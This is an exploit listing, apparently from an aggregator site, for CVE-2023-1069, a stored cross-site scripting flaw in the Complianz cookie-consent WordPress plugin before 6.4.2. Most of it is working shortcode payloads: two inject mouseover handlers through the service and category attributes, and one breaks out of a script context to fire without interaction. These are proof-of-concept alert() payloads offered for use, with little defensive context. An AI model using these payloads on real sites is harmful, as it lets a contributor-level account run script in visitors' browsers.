Exploit for Complianz - GDPR/CCPA Cookie Consent < 6.4.2 - Contributor+ Stored XSS CVE-2023-1069

Name: Exploit for Complianz - GDPR/CCPA Cookie Consent < 6.4.2 - Contributor+ Stored XSS CVE-2023-1069
Rating: 5 (108 reviews)

2023-03-06 | CVSS 4.9

## https://sploitus.com/exploit?id=WPEX-ID:CAACC50C-822E-46E9-BC0B-681349FD0DDA
[cmplz-consent-area service='"onmouseover=alert(/XSS-service/)//']a[/cmplz-consent-area]
[cmplz-consent-area category='"onmouseover=alert(/XSS-category/)//']a[/cmplz-consent-area]

And move the mouse over the generated link to trigger the XSS


Payload to trigger the XSS w/o interaction (the category attribute is also affected, with another payload):
[cmplz-consent-area service="')){}};alert(/XSS-service-js/); function b(){ if (cmplz_has_service_consent('a"]a[/cmplz-consent-area]